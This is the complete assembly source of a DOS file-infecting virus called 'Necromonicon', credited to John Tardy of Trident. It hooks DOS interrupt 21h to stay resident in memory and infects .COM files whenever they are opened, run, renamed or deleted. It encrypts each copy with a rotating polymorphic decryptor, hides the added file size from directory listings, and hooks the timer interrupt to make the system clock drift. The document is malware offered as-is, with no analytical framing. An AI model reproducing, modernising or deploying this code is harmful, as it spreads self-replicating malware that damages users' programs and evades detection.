;
; Necromonicon Virus by John Tardy
;

                Org 0h

decr:           jmp Crypt
                db 'Carcass'
Loopje          DB 0e2h
                db 0fah
DecrLen         Equ $-Decr

Crypt:          Push Ax
                call Get_Ofs
Get_Ofs:        pop Bp
                sub Bp,Get_Ofs
                Mov Ax,0DEADh
                Int 21h
                Cmp Ax,0AAAAh
                Je  Installed

                mov ax,3521h
                int 21h
                mov word ptr cs:old21[bp],bx
                mov word ptr cs:old21[bp][2],es

                mov ax,cs
                dec ax
                mov ds,ax
                cmp byte ptr ds:[0000],'Z'
                jne installed
                mov ax,word ptr ds:[0003]
                sub ax,ParLen
                jb  installed
                mov word ptr ds:[0003],ax
                sub word ptr ds:[0012h],ParLen
                lea si,decr[bp]
                mov di,0
                mov es,ds:[12h]
                mov ds,cs
                mov cx,virlen
                cld
                rep movsb
                mov ax,2521h
                mov ds,es
                mov dx,offset new21
                int 21h
                push es
                Mov     Ax,351ch
                Int     21h
                Mov     Word Ptr OldInt1c[0],Bx
                Mov     Word Ptr OldInt1c[2],Es
                Mov     Ax,251ch
                Lea     Dx,NewInt1c
                Pop     Ds
                Int     21h

Installed:      Mov Di,100h
                Lea Si,Org_Prg[Bp]
                Push Cs
                Push Cs
                Pop Ds
                Pop Es
                Cld
                Movsw
                Movsb
                Mov Bx,100h
                Pop Ax
                Push Bx
                Ret

OldInt1c        DD      0

NewInt1c:       Pushf
                Push    Ds
                Push    Ax
                Xor     Ax,Ax
                Push    Ax
                Pop     Ds
                Mov     Ax,Word Ptr Ds:[46ch]
                Dec     Word Ptr Ds:[46ch]
                Dec     Word Ptr Ds:[46ch]
                Cmp     Ax,Word Ptr Ds:[46ch]
                Ja      EOI1C
                Dec     Word Ptr Ds:[46eh]
EOI1C:          Pop     Ax
                Pop     Ds
                Popf
                Iret

Old21           dd 0

New21:          cmp ax,0deadh
                jne chkfunc
                mov ax,0aaaah
                mov cx,ax
                iret
chkfunc:        cmp ah,11h
                je  findFCBst
                cmp ah,12h
                je findfcbst
                cmp ah,4eh
                je findst
                cmp ah,4fh
                je findst
                push ax
                push bx
                push cx
                push dx
                push si
                push di
                push bp
                push ds
                push es
                cmp ah,3dh
                je  infectHan
                cmp ax,4b00h
                je  infectHan
                cmp ah,41h
                je  infectHan
                cmp ah,43h
                je  infectHan
                cmp ah,56h
                je  infectHan
                cmp ah,0fh
                je  infectFCB
                cmp ah,23h
                je  infectFCB
                cmp ah,6ch
                je  infectdos4
                jmp endint

findfcbst:      jmp findfcb
findst:         jmp find

InfectFCB:      mov si,dx
                inc si
                push cs
                pop es
                lea di,fnam
                mov cx,8
                rep movsb
                mov cx,3
                inc di
                rep movsb
                lea dx,fnam
                push cs
                pop ds

InfectHan:      mov si,dx
                mov cx,100h
                cld
findpnt:        lodsb
                cmp al,'.'
                je  chkcom
                loop findpnt
                jmp  endi

infectdos4:     and dx,0fh
                cmp dx,1
                jne endi
                mov dx,si
                jmp infecthan

chkcom:         lodsw
                or ax,2020h
                cmp ax,'oc'
                jne endi
                lodsb
                or al,20h
                cmp al,'m'
                jne endi
                jmp doitj
endi:           jmp endint
doitj:          push dx
                push ds
                mov ax,4300h
                call dos
                mov cs:fatr,cx
                mov ax,4301h
                xor cx,cx
                call dos
                mov ax,3d02h
                call dos
                jnc getdate
                jmp error
getdate:        xchg ax,bx
                mov ax,5700h
                call dos
                mov cs:fdat,cx
                mov cs:fdat[2],dx
                and cx,1fh
                cmp cx,1fh
                jne chkexe
                jmp done
chkexe:         mov ah,3fh
                push cs
                pop ds
                lea dx,Org_prg
                mov cx,3
                call dos
                cmp word ptr cs:Org_prg[0],'ZM'
                je  close
                cmp word ptr cs:Org_prg[0],'MZ'
                je close

                Mov ax,4202h
                xor cx,cx
                xor dx,dx
                call dos

                sub ax,3
                mov cs:jump[1],ax

                Add Ax,Offset Crypt+103h
                Mov S_1[1],Ax
                Mov S_2[1],Ax
                Mov S_3[4],Ax
                Mov S_4[4],Ax
                Call GenPoly

                mov ah,40h
                push cs
                pop ds
                lea dx,coder
                mov cx,virlen
                call dos

                mov ax,4200h
                xor cx,cx
                xor dx,dx
                call dos

                mov ah,40h
                lea dx,jump
                mov cx,3
                call dos

                or  cs:fdat,01fh

close:          mov ax,5701h
                mov cx,cs:fdat
                mov dx,cs:fdat[2]
                call dos

done:           mov ah,3eh
                call dos
                pop ds
                pop dx
                push dx
                push ds
                mov ax,4301h
                mov cx,fatr
                call dos

error:          pop ds
                pop dx

endint:         pop es
                pop ds
                pop bp
                pop di
                pop si
                pop dx
                pop cx
                pop bx
                pop ax
                jmp dword ptr cs:[old21]

GenPoly:        Xor Byte Ptr [Loopje],2
                Xor Ax,Ax
                Mov Es,Ax
                Mov Ax,Es:[46ch]
                Mov Es,Cs
                Push Ax
                And Ax,07ffh
                Add Ax,CryptLen
                Mov S_1[4],Ax
                Mov S_2[4],Ax
                Mov S_3[1],Ax
                Mov S_4[1],Ax
Doit:           Pop Ax
                Push Ax
                And Ax,3
                Shl Ax,1
                Mov Si,Ax
                Mov Ax,Word Ptr Table[Si]
                Mov Si,Ax
                Lea Di,decr
                Movsw
                Movsw
                Movsw
                Movsw
                Pop Ax
                Stosb
                Movsb
                Mov Dl,Al
                Lea Si,Decr
                Lea Di,Coder
                Mov Cx,DecrLen
                Rep Movsb
                Lea Si,Crypt
                Mov Cx,CryptLen
Encrypt:        Lodsb
                Xor Al,Dl
                Stosb
                Loop Encrypt
                Cmp Dl,0
                Je  Fuckit
                Ret

FuckIt:         Lea Si,Encr0
                Lea Di,Coder
                Mov Cx,Encr0Len
                Rep Movsb
                Mov Ax,Cs:jump[1]
                Add Ax,Encr0Len+2
                Mov Cs:jump[1],Ax
                Ret

Table           DW Offset S_1
                DW Offset S_2
                DW Offset S_3
                DW Offset S_4

S_1:            Lea Si,0
                Mov Cx,0
                DB 80h,34h
                Inc Si
S_2:            Lea Di,0
                Mov Cx,0
                DB 80h,35h
                Inc Di
S_3:            Mov Cx,0
                Lea Si,0
                DB 80h,34h
                Inc Si
S_4:            Mov Cx,0
                Lea Di,0
                DB 80h,35h
                Inc Di

                Db '[ '
Encr0           Db 'John Tardy'
Encr0Len        Equ $-Encr0

                Db ' / Trident'
                Db ' ]'

getdta:         pop si
                pushf
                push ax
                push bx
                push es
                mov  ah,2fh
                call dos
                jmp short si

FindFCB:        call DOS
                cmp al,0
                jne Ret1
                call getdta
                cmp byte ptr es:[bx],-1
                jne FCBOk
                add bx,8
FCBOk:          mov al,es:[bx+16h]
                and al,1fh
                cmp al,1fh
                jne FileOk
                sub word ptr es:[bx+1ch],Virlen
                sbb word ptr es:[bx+1eh],0
                jmp short Time

Find:           call DOS
                jc Ret1
                call getdta
                mov al,es:[bx+16h]
                and al,1fh
                cmp al,1fh
                jne FileOk
                sub word ptr es:[bx+1ah],VirLen
                sbb word ptr es:[bx+1ch],0
Time:           xor byte ptr es:[bx+16h],10h
FileOk:         pop es
                pop bx
                pop ax
                popf
Ret1:           retf 2

                Db '| Trapped in a spell of the Necromonicon |'

dos:            pushf
                call dword ptr cs:[old21]
                ret

Org_prg         dw 0cd90h
                db 20h

fnam            db 8 dup (0)
                db '.'
                db 3 dup (0)
                db 0
fatr            dw 0
fdat            dw 0,0


jump            db 0e9h,0,0

ResLen          Equ ($-Decr)/10h

ParLen          Equ (Reslen*2)+10h

CryptLen        Equ $-Crypt

VirLen          Equ $-Decr

Coder           Equ $